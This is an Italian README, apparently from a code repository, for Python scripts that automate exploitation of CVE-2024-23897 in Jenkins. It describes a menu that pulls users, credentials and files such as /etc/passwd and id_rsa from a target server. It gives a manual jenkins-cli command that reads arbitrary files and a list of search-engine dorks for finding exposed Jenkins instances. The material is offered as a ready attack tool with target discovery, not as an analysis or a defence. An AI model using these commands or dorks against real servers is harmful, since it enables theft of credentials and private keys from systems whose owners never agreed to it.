
Uno script realizzato in Python per automatizzare la vulnerabilità CVE-2024-23897
Versioni interessate:
Uno script realizzato in Python per automatizzare la vulnerabilità CVE-2024-23897 🤖 🛠️
Questo codice Python presenta uno scanner per una vulnerabilità specifica (CVE-2024-23897) nei server Jenkins. Inizia chiedendo all'utente l'URL del server Jenkins.
Successivamente, offre l'opzione di scaricare il file "jenkins-cli.jar" necessario per interagire con Jenkins dalla riga di comando. In seguito, presenta un menu di opzioni che include l'esecuzione di comandi come ottenere informazioni sul server, sull'ambiente, sulla configurazione di Jenkins, sugli utenti e sulle credenziali, oltre a effettuare letture di file sensibili come "/etc/passwd", "/etc/os-release" e "id_rsa".
Una volta selezionata un'opzione dal menu, viene eseguito il comando corrispondente sul server Jenkins fornito. Il codice è strutturato con funzioni per scaricare il file ed eseguire i comandi, e una funzione principale per gestire il flusso del programma.
Esecuzione per server Jenkins 📝:
python3 CVE-2024-23897-A-scaner.py
esecuzione per server Jenkins IN DOCKER 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
esecuzione manuale.
1- scaricare jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- per effettuare LFI, esegui: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
elenco dork:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"